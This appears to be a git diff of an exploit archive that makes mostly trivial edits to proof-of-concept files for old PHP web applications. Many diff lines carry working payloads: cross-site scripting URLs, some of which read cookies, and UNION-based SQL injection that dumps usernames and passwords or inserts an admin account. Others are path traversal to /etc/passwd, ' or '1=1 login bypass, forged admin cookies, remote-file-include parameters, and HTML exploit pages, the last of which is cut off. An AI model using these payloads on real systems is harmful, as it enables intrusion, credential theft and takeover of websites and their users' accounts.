http://www.example.com/upload/memberlist.php?=>"'><ScRiPt>alert(213771818860)</S http://www.example.com/upload/member.php/>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/inlinemod.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt> -http://www.example.com/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> \ No newline at end of file +http://www.example.com/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/33661.txt b/platforms/php/webapps/33661.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33665.txt b/platforms/php/webapps/33665.txt old mode 100755 new mode 100644 index 3b19c79ed..3681beb55 --- a/platforms/php/webapps/33665.txt +++ b/platforms/php/webapps/33665.txt @@ -4,4 +4,4 @@ Softbiz Jobs is prone to a cross-site scripting vulnerability because it fails t An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -htpp://www.example.com/scripts/seojobs/admin/addad.php?sbad_type="><script>alert(123)</script> \ No newline at end of file +htpp://www.example.com/scripts/seojobs/admin/addad.php?sbad_type="><script>alert(123)</script> \ No newline at end of file diff --git a/platforms/php/webapps/3367.txt b/platforms/php/webapps/3367.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33671.txt b/platforms/php/webapps/33671.txt old mode 100755 new mode 100644 index 935cbbf93..3f5c1577e --- a/platforms/php/webapps/33671.txt +++ b/platforms/php/webapps/33671.txt @@ -12,4 +12,4 @@ http://www.example.com/memberlist.php/>'><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/MySBB/new.php/>'><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/MySBB/pm.php/>'><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/MySBB/register.php/>'><ScRiPt>alert(213771818860)</ScRiPt> -http://www.example.com/MySBB/search.php/>'><ScRiPt>alert(213771818860)</ScRiPt> \ No newline at end of file +http://www.example.com/MySBB/search.php/>'><ScRiPt>alert(213771818860)</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/33674.txt b/platforms/php/webapps/33674.txt old mode 100755 new mode 100644 index b906e1037..180a2826d --- a/platforms/php/webapps/33674.txt +++ b/platforms/php/webapps/33674.txt @@ -13,4 +13,4 @@ http://www.example.com/sources/javascript/loadScripts.php?scripts=[file]%00 The following example data is available: -javascript:document.cookie="installerFile=[FIle];path='/upload/admin/plugins' \ No newline at end of file +javascript:document.cookie="installerFile=[FIle];path='/upload/admin/plugins' \ No newline at end of file diff --git a/platforms/php/webapps/33676.txt b/platforms/php/webapps/33676.txt old mode 100755 new mode 100644 index f13ea371e..17f986f9c --- a/platforms/php/webapps/33676.txt +++ b/platforms/php/webapps/33676.txt @@ -8,4 +8,4 @@ Versions prior to Newbie CMS 0.03 are vulnerable; other versions may also be aff Supplying the following cookie data is sufficient to exploit this issue: -javascript:document.cookie="nb_logged=jiko;path=/newbb/admin/"; \ No newline at end of file +javascript:document.cookie="nb_logged=jiko;path=/newbb/admin/"; \ No newline at end of file diff --git a/platforms/php/webapps/33679.txt b/platforms/php/webapps/33679.txt old mode 100755 new mode 100644 index caa4f1461..e56e0c715 --- a/platforms/php/webapps/33679.txt +++ b/platforms/php/webapps/33679.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow TRUC 0.11.0 is vulnerable; other versions may also be affected. -http://www.example.com/truc/login_reset_password_page.php?failed=true&error="><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/truc/login_reset_password_page.php?failed=true&error="><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/33680.txt b/platforms/php/webapps/33680.txt old mode 100755 new mode 100644 index 0b40ccbba..0bbec8ee5 --- a/platforms/php/webapps/33680.txt +++ b/platforms/php/webapps/33680.txt @@ -9,4 +9,4 @@ Open Educational System 0.1 beta and prior versions are vulnerable. http://www.example.com/[path]/admin/modules/modules/forum/admin.php?CONF_INCLUDE_PATH=attacker's site http://www.example.com/[path]/admin/modules/modules/plotgraph/index.php?CONF_INCLUDE_PATH=attacker's site http://www.example.com/[path]/admin/modules/user_account/admin_user/mod_admuser.php?CONF_INCLUDE_PATH=attacker's site -http://www.example.com/[path]/admin/modules/user_account/ogroup/mod_group.php?CONF_INCLUDE_PATH=attacker's site \ No newline at end of file +http://www.example.com/[path]/admin/modules/user_account/ogroup/mod_group.php?CONF_INCLUDE_PATH=attacker's site \ No newline at end of file diff --git a/platforms/php/webapps/33681.txt b/platforms/php/webapps/33681.txt old mode 100755 new mode 100644 index b63bf7f16..f56580192 --- a/platforms/php/webapps/33681.txt +++ b/platforms/php/webapps/33681.txt @@ -10,4 +10,4 @@ The following example URIs are available: http://www.example.com/sd/setup.php?op=language&lang=1 -http://www.example.com/sd/install/index.php?op=language&lang=1 \ No newline at end of file +http://www.example.com/sd/install/index.php?op=language&lang=1 \ No newline at end of file diff --git a/platforms/php/webapps/33683.txt b/platforms/php/webapps/33683.txt old mode 100755 new mode 100644 index ab490bd04..b28258073 --- a/platforms/php/webapps/33683.txt +++ b/platforms/php/webapps/33683.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor Article Friendly Pro is vulnerable; other versions may also be affected. -http://www.example.com/admin/index.php?filename=../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/admin/index.php?filename=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/33684.txt b/platforms/php/webapps/33684.txt old mode 100755 new mode 100644 index dc12abdf9..e47bcd69d --- a/platforms/php/webapps/33684.txt +++ b/platforms/php/webapps/33684.txt @@ -9,4 +9,4 @@ Blax Blog 0.1 is vulnerable; other versions may also be affected. http://www.example.com/admin/girisyap.php Username: ' or '1=1 -password: ' or '1=1 \ No newline at end of file +password: ' or '1=1 \ No newline at end of file diff --git a/platforms/php/webapps/33685.html b/platforms/php/webapps/33685.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33688.txt b/platforms/php/webapps/33688.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33697.txt b/platforms/php/webapps/33697.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33699.txt b/platforms/php/webapps/33699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33702.txt b/platforms/php/webapps/33702.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33706.txt b/platforms/php/webapps/33706.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33709.txt b/platforms/php/webapps/33709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3371.php b/platforms/php/webapps/3371.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33714.txt b/platforms/php/webapps/33714.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33716.txt b/platforms/php/webapps/33716.txt old mode 100755 new mode 100644 index 2085c9637..d54c864cf --- a/platforms/php/webapps/33716.txt +++ b/platforms/php/webapps/33716.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor Saskia's Shopsystem beta1 is vulnerable; other versions may also be affected. -http://www.example.com/content.php?id=[LFI%00] \ No newline at end of file +http://www.example.com/content.php?id=[LFI%00] \ No newline at end of file diff --git a/platforms/php/webapps/33718.txt b/platforms/php/webapps/33718.txt old mode 100755 new mode 100644 index b85f3d2fa..4e939e104 --- a/platforms/php/webapps/33718.txt +++ b/platforms/php/webapps/33718.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor phpCOIN 1.2.1 is vulnerable; other versions may also be affected. -http://www.example.com/phpcoin/mod.php?mod=/../../../../../../proc/self/environ%00 \ No newline at end of file +http://www.example.com/phpcoin/mod.php?mod=/../../../../../../proc/self/environ%00 \ No newline at end of file diff --git a/platforms/php/webapps/3372.php b/platforms/php/webapps/3372.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33723.html b/platforms/php/webapps/33723.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33724.txt b/platforms/php/webapps/33724.txt old mode 100755 new mode 100644 index 7c9e834ca..2d657de16 --- a/platforms/php/webapps/33724.txt +++ b/platforms/php/webapps/33724.txt @@ -8,4 +8,4 @@ OpenCart 1.3.2 is vulnerable; other versions may also be affected. http://www.example.com/index.php?route=product%2Fspecial&path=20&page=' http://www.example.com/index.php?route=product%2Fspecial&path=20&page=\' -http://www.example.com/index.php?route=product%2Fcategory&path=20&page=andres'" \ No newline at end of file +http://www.example.com/index.php?route=product%2Fcategory&path=20&page=andres'" \ No newline at end of file diff --git a/platforms/php/webapps/33726.txt b/platforms/php/webapps/33726.txt old mode 100755 new mode 100644 index 7e3dcb087..2dea0840e --- a/platforms/php/webapps/33726.txt +++ b/platforms/php/webapps/33726.txt @@ -11,4 +11,4 @@ Exploiting these issues could allow an attacker to compromise the application, a Versions prior to TikiWiki 4.2 are vulnerable. http://www.example.com/tiki-searchresults.php?highlight=misja&date=1 month)); INSERT INTO users_users(email,login,password,hash) VALUES ('','bad_guy','lsjfsofasgfs',md5('lsjfsofasgfslsjfsofasgfs'));;--&search=>> -http://www.example.com/tiki-searchresults.php?highlight=misja&date=1 month)); INSERT INTO users_usergroups (`userId`, `groupName`) VALUES([user_id],'Admins');;--&search=>> \ No newline at end of file +http://www.example.com/tiki-searchresults.php?highlight=misja&date=1 month)); INSERT INTO users_usergroups (`userId`, `groupName`) VALUES([user_id],'Admins');;--&search=>> \ No newline at end of file diff --git a/platforms/php/webapps/33727.txt b/platforms/php/webapps/33727.txt old mode 100755 new mode 100644 index aa14e9c49..ed6bfe2e9 --- a/platforms/php/webapps/33727.txt +++ b/platforms/php/webapps/33727.txt @@ -9,4 +9,4 @@ wh-em.com upload 7.0 is vulnerable; other versions may also be affected. The following example data is available: javascript:document.cookie="whem_Name=adm_user;path=/"; -javascript:document.cookie="whem_Password=adm_user;path=/"; \ No newline at end of file +javascript:document.cookie="whem_Password=adm_user;path=/"; \ No newline at end of file diff --git a/platforms/php/webapps/33732.txt b/platforms/php/webapps/33732.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33734.txt b/platforms/php/webapps/33734.txt old mode 100755 new mode 100644 index d0728d581..8fd9272ad --- a/platforms/php/webapps/33734.txt +++ b/platforms/php/webapps/33734.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow DDL CMS 2.1 is vulnerable; other versions may also be affected. -http://www.example.com/ddl/blacklist.php?site_name=[XSS] \ No newline at end of file +http://www.example.com/ddl/blacklist.php?site_name=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3374.txt b/platforms/php/webapps/3374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33748.txt b/platforms/php/webapps/33748.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33749.txt b/platforms/php/webapps/33749.txt old mode 100755 new mode 100644 index e757d4361..5472b7979 --- a/platforms/php/webapps/33749.txt +++ b/platforms/php/webapps/33749.txt @@ -10,4 +10,4 @@ http://www.example.com/rus/details/â??+benchmark(10000,md5(now()))+â??/ http://www.example.com/rus/referaty/1'+benchmark(10000,md5(now()))-â??1/ -http://www.example.com/rus/â??+benchmark(10000,md5(now()))+â??/ \ No newline at end of file +http://www.example.com/rus/â??+benchmark(10000,md5(now()))+â??/ \ No newline at end of file diff --git a/platforms/php/webapps/33751.txt b/platforms/php/webapps/33751.txt old mode 100755 new mode 100644 index 686a68fcf..0ee840fae --- a/platforms/php/webapps/33751.txt +++ b/platforms/php/webapps/33751.txt @@ -7,4 +7,4 @@ Exploiting these issues may allow an attacker to compromise the application and CodeIgniter 1.0 is vulnerable; other versions may also be affected. http://www.example.com/system/database/DB_active_rec.php?BASEPATH=[Shell.txt?] -http://www.example.com/system/database/DB_driver.php?BASEPATH=[Shell.txt?] \ No newline at end of file +http://www.example.com/system/database/DB_driver.php?BASEPATH=[Shell.txt?] \ No newline at end of file diff --git a/platforms/php/webapps/33753.txt b/platforms/php/webapps/33753.txt old mode 100755 new mode 100644 index e71109f52..0f7876ef7 --- a/platforms/php/webapps/33753.txt +++ b/platforms/php/webapps/33753.txt @@ -4,4 +4,4 @@ Easynet4u Forum Host is prone to an SQL-injection vulnerability because it fails A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/SCRIPT_PATH/topic.php?topic=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6/**/FROM/**/users/*&forum=0 \ No newline at end of file +http://www.example.com/SCRIPT_PATH/topic.php?topic=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6/**/FROM/**/users/*&forum=0 \ No newline at end of file diff --git a/platforms/php/webapps/33754.txt b/platforms/php/webapps/33754.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33756.txt b/platforms/php/webapps/33756.txt old mode 100755 new mode 100644 index abf5958fd..07aecd56b --- a/platforms/php/webapps/33756.txt +++ b/platforms/php/webapps/33756.txt @@ -4,4 +4,4 @@ The 'com_seek' component for Joomla! is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_seek&task=list1&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- \ No newline at end of file +http://www.example.com/index.php?option=com_seek&task=list1&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- \ No newline at end of file diff --git a/platforms/php/webapps/33757.txt b/platforms/php/webapps/33757.txt old mode 100755 new mode 100644 index 0d3ebe8b3..62ebd33e5 --- a/platforms/php/webapps/33757.txt +++ b/platforms/php/webapps/33757.txt @@ -4,4 +4,4 @@ The Joomla! 'com_d-greinar' component is prone to a cross-site scripting vulnera An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/index.php?option=com_d-greinar&Itemid=11&do=allar&maintree="><script>alert(/DevilZ TM/)</script> \ No newline at end of file +http://www.example.com/index.php?option=com_d-greinar&Itemid=11&do=allar&maintree="><script>alert(/DevilZ TM/)</script> \ No newline at end of file diff --git a/platforms/php/webapps/33762.txt b/platforms/php/webapps/33762.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33763.txt b/platforms/php/webapps/33763.txt old mode 100755 new mode 100644 index d0d1b2ae7..53f59b81a --- a/platforms/php/webapps/33763.txt +++ b/platforms/php/webapps/33763.txt @@ -4,4 +4,4 @@ Domain Verkaus & Auktions Portal is prone to an SQL-injection vulnerability beca Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/portal/index.php?a=d&id=[SQLi] \ No newline at end of file +http://www.example.com/portal/index.php?a=d&id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/33766.txt b/platforms/php/webapps/33766.txt old mode 100755 new mode 100644 index 0cad0a69c..6bccc39f7 --- a/platforms/php/webapps/33766.txt +++ b/platforms/php/webapps/33766.txt @@ -4,4 +4,4 @@ The 'com_as' component for Joomla! is prone to an SQL-injection vulnerability be Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_as&as=100&catid=-20 UNION SELECT 1,2,3,concat(username,0x3a,password)...+from+jos_users-- \ No newline at end of file +http://www.example.com/index.php?option=com_as&as=100&catid=-20 UNION SELECT 1,2,3,concat(username,0x3a,password)...+from+jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/33769.txt b/platforms/php/webapps/33769.txt old mode 100755 new mode 100644 index df87b5652..396198f67 --- a/platforms/php/webapps/33769.txt +++ b/platforms/php/webapps/33769.txt @@ -7,4 +7,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor eFront 3.5.5 and prior are vulnerable. http://www.example.com/efront/www/editor/tiny_mce/langs/language.php?langname=a/../../../../../../boot.ini%00 -http://www.example.com/efront/www/editor/tiny_mce/langs/language.php?langname=../../../../upload/student/message_attachments/Sent/1266862529/malicious.php.inc%00 \ No newline at end of file +http://www.example.com/efront/www/editor/tiny_mce/langs/language.php?langname=../../../../upload/student/message_attachments/Sent/1266862529/malicious.php.inc%00 \ No newline at end of file diff --git a/platforms/php/webapps/33771.txt b/platforms/php/webapps/33771.txt old mode 100755 new mode 100644 index f23604f11..ff4a8f5dd --- a/platforms/php/webapps/33771.txt +++ b/platforms/php/webapps/33771.txt @@ -4,4 +4,4 @@ The 'com_alert' component for Joomla! is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/Joomla/index.php?option=com_alert&task=item&q_item=-1 union select 1, concat(username,0x3e,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users-- \ No newline at end of file +http://www.example.com/Joomla/index.php?option=com_alert&task=item&q_item=-1 union select 1, concat(username,0x3e,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/33772.txt b/platforms/php/webapps/33772.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33773.txt b/platforms/php/webapps/33773.txt old mode 100755 new mode 100644 index 0e740527b..36cb43b4f --- a/platforms/php/webapps/33773.txt +++ b/platforms/php/webapps/33773.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Shutter 0.1.4 is vulnerable; other versions may also be affected. http://www.example.com/shutter/admin.html?albumID=2%20and%20substring%28@@version,1,1%29=5 -http://www.example.com/shutter/admin.html?albumID=2&photoID=5%20and%20substring%28@@version,1,1%29=5 \ No newline at end of file +http://www.example.com/shutter/admin.html?albumID=2&photoID=5%20and%20substring%28@@version,1,1%29=5 \ No newline at end of file diff --git a/platforms/php/webapps/33776.txt b/platforms/php/webapps/33776.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33777.txt b/platforms/php/webapps/33777.txt old mode 100755 new mode 100644 index f584d2840..8efbf1536 --- a/platforms/php/webapps/33777.txt +++ b/platforms/php/webapps/33777.txt @@ -15,4 +15,4 @@ http://www.example.com/profile.php?action=forumright"><script>alert(/Liscker/);< http://www.example.com/thread.php?skinco=black"><script>alert(/Liscker/);</script> http://www.example.com/message.php?action=scout"><script>alert(/Liscker/);</script> http://www.example.com/sort.php?skinco=black"><script>alert(/Liscker/);</script> -http://www.example.com/userpay.php?skinco=black"><script>alert(/Liscker/);</script> \ No newline at end of file +http://www.example.com/userpay.php?skinco=black"><script>alert(/Liscker/);</script> \ No newline at end of file diff --git a/platforms/php/webapps/33781.txt b/platforms/php/webapps/33781.txt old mode 100755 new mode 100644 index e04a931a6..8405ea887 --- a/platforms/php/webapps/33781.txt +++ b/platforms/php/webapps/33781.txt @@ -7,4 +7,4 @@ Exploiting these issues may allow an attacker to compromise the application and Vanilla 1.1.10 and prior versions are vulnerable. http://www.example.com/PATH/languages/yourlanguage/definitions.php?include= [inj3ct0r] -http://www.example.com/PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r] \ No newline at end of file +http://www.example.com/PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r] \ No newline at end of file diff --git a/platforms/php/webapps/33782.txt b/platforms/php/webapps/33782.txt old mode 100755 new mode 100644 index cef8adbea..40650299d --- a/platforms/php/webapps/33782.txt +++ b/platforms/php/webapps/33782.txt @@ -4,4 +4,4 @@ PHPKIT 'b-day.php' addon is prone to an SQL-injection vulnerability because it f Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/include.php?path=b-day.php&ausgabe=11+uNIoN+sElECt+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1-- \ No newline at end of file +http://www.example.com/include.php?path=b-day.php&ausgabe=11+uNIoN+sElECt+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1-- \ No newline at end of file diff --git a/platforms/php/webapps/33784.txt b/platforms/php/webapps/33784.txt old mode 100755 new mode 100644 index 528eb0d6f..a25487283 --- a/platforms/php/webapps/33784.txt +++ b/platforms/php/webapps/33784.txt @@ -10,4 +10,4 @@ The following example URIs are available: http://www.example.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script> -http://www.example.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/33787.txt b/platforms/php/webapps/33787.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3379.php b/platforms/php/webapps/3379.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33793.txt b/platforms/php/webapps/33793.txt old mode 100755 new mode 100644 index c52b38cce..7f0e12abf --- a/platforms/php/webapps/33793.txt +++ b/platforms/php/webapps/33793.txt @@ -4,4 +4,4 @@ Kasseler CMS is prone to an SQL-injection vulnerability because it fails to suff Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?module=News&do=Category&id= [ SQL ] \ No newline at end of file +http://www.example.com/index.php?module=News&do=Category&id= [ SQL ] \ No newline at end of file diff --git a/platforms/php/webapps/33794.txt b/platforms/php/webapps/33794.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33795.txt b/platforms/php/webapps/33795.txt old mode 100755 new mode 100644 index 089407145..458446351 --- a/platforms/php/webapps/33795.txt +++ b/platforms/php/webapps/33795.txt @@ -5,4 +5,4 @@ The 'com_aml_2' component for Joomla! is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_aml_2&task=annonce&page=detail&rub=immobilier&art=75+and+1=0+union+select+1,2,3,4,concat%28username,0xa,password,email%29,6,7,8+from+jos_users-- \ No newline at end of file +http://www.example.com/index.php?option=com_aml_2&task=annonce&page=detail&rub=immobilier&art=75+and+1=0+union+select+1,2,3,4,concat%28username,0xa,password,email%29,6,7,8+from+jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/33796.txt b/platforms/php/webapps/33796.txt old mode 100755 new mode 100644 index 335b2301f..962b4469b --- a/platforms/php/webapps/33796.txt +++ b/platforms/php/webapps/33796.txt @@ -4,4 +4,4 @@ The 'com_cb' component for Joomla! is prone to an SQL-injection vulnerability be Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_cx&task=postview&postid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41-- \ No newline at end of file +http://www.example.com/index.php?option=com_cx&task=postview&postid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41-- \ No newline at end of file diff --git a/platforms/php/webapps/33797.txt b/platforms/php/webapps/33797.txt old mode 100755 new mode 100644 index 2b2dc7766..c6fe16f90 --- a/platforms/php/webapps/33797.txt +++ b/platforms/php/webapps/33797.txt @@ -4,4 +4,4 @@ The 'com_jresearch' component for Joomla! is prone to a local file-include vulne An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00 \ No newline at end of file +http://www.example.com/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00 \ No newline at end of file diff --git a/platforms/php/webapps/33809.txt b/platforms/php/webapps/33809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33812.txt b/platforms/php/webapps/33812.txt old mode 100755 new mode 100644 index bf81df328..7adbf52eb --- a/platforms/php/webapps/33812.txt +++ b/platforms/php/webapps/33812.txt @@ -4,4 +4,4 @@ The 'com_weblinks' component for Joomla! is prone to an SQL-injection vulnerabil Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_weblinks&task=view&catid=8&id=-1 UNION SELECT 1,2,3,4,5 \ No newline at end of file +http://www.example.com/index.php?option=com_weblinks&task=view&catid=8&id=-1 UNION SELECT 1,2,3,4,5 \ No newline at end of file diff --git a/platforms/php/webapps/33813.html b/platforms/php/webapps/33813.html old mode 100755 new mode 100644 index 3a14e8aca..a5e06b1d9 --- a/platforms/php/webapps/33813.html +++ b/platforms/php/webapps/33813.html @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc CapCC 1.0 is affected; other versions may also be vulnerable. -<html> <head> <title>CapCC SQL Injection exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-admin/plugins.php?page=capcc-config" method="post"> <input type="hidden" name="CAPCC_MAX_ATTEMPTS" value="5 and benchmark(10000000,benchmark(10000000,md5(now())))"> </form> </body> </html> \ No newline at end of file +<html> <head> <title>CapCC SQL Injection exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-admin/plugins.php?page=capcc-config" method="post"> <input type="hidden" name="CAPCC_MAX_ATTEMPTS" value="5 and benchmark(10000000,benchmark(10000000,md5(now())))"> </form> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/33814.txt b/platforms/php/webapps/33814.txt old mode 100755 new mode 100644 index 176e1b3c3..26cbf069b --- a/platforms/php/webapps/33814.txt +++ b/platforms/php/webapps/33814.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to Piwik 0.6 are vulnerable. -http://www.example.com/index.php?form_url=>"> \ No newline at end of file +http://www.example.com/index.php?form_url=>"> \ No newline at end of file diff --git a/platforms/php/webapps/33815.txt b/platforms/php/webapps/33815.txt old mode 100755 new mode 100644 index b485d8bd6..d87306ce5 --- a/platforms/php/webapps/33815.txt +++ b/platforms/php/webapps/33815.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow OSSIM 2.2.1 is vulnerable; other versions may also be affected. http://www.example.com/ossim/control_panel/alarm_console.php/"><script>alert('xss')</script> -http://www.example.com/ossim/control_panel/alarm_console.php/')"%20onMouseOver="alert('xss');// \ No newline at end of file +http://www.example.com/ossim/control_panel/alarm_console.php/')"%20onMouseOver="alert('xss');// \ No newline at end of file diff --git a/platforms/php/webapps/33818.txt b/platforms/php/webapps/33818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3382.txt b/platforms/php/webapps/3382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33820.txt b/platforms/php/webapps/33820.txt old mode 100755 new mode 100644 index 8fd801266..0c0c832fa --- a/platforms/php/webapps/33820.txt +++ b/platforms/php/webapps/33820.txt @@ -7,4 +7,4 @@ An attacker can exploit these vulnerabilities to obtain potentially sensitive in PotatoNews 1.0.2 is vulnerable; other versions may also be affected. http://www.example.com/newcopy/timeago.php?nid=../../../../../../../[file]%00 -http://www.example.com/update/timeago.php?nid=../../../../../../../[file]%00 \ No newline at end of file +http://www.example.com/update/timeago.php?nid=../../../../../../../[file]%00 \ No newline at end of file diff --git a/platforms/php/webapps/33821.html b/platforms/php/webapps/33821.html old mode 100755 new mode 100644 index 5afe0c4a9..34ce6a632 --- a/platforms/php/webapps/33821.html +++ b/platforms/php/webapps/33821.html @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities to obtain potentially sensitive in n-cms-equipe 1.1C-Debug is vulnerable; other versions may also be affected. -<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>#####coded by ahmadbady#####</title> <script language="JavaScript"> //=========================================================================== //( #Topic : N'CMS Updated 2010-02-24 //( #Bug type : local file include //( #Download : http://sourceforge.net/projects/n-cms/files/N-CMS%20Equipe/n-cms-equipe-V1.1C-Debug.zip/download //( #Advisory : //=========================================================================== //( #Author : ItSecTeam //( #Email : Bug@ITSecTeam.com # //( #Website: http://www.itsecteam.com # //( #Forum : http://forum.ITSecTeam.com # //--------------------------------------------------------------------- var variable1 ="?page=" var variable2 ="?tData[name]=" function it(){ if (xpl.file.value=="includs.php"){ variable1 = variable2; } xpl.action= xpl.victim.value+xpl.path.value+xpl.file.value+variable1+xpl.file0.value;xpl.submit(); } </script> </head> <body bgcolor="#FFFFFF"> <p align="left"><font color="#0000FF">N'CMS & N'Games local file include Vulnerability</font></p> <p align="left"><font color="#FF0000">vul1 file:/path/template/theme1/content/body.php</font></p> <p align="left"><font color="#FF0000">vul2 file:/path/template/theme1/content/includs.php</font></p> <p align="left"><font color="#0000FF">-----------------------------------</font></p> <form method="post" name="xpl" onSubmit="it();"> <p align="left"> <font size="2" face="Tahoma"> victim: <input type="text" name="victim" size="20";" style="color: #FFFFFF; background-color: #000000" value="http://127.0.0.1"> path: <input type="text" name="path" size="20";" style="color: 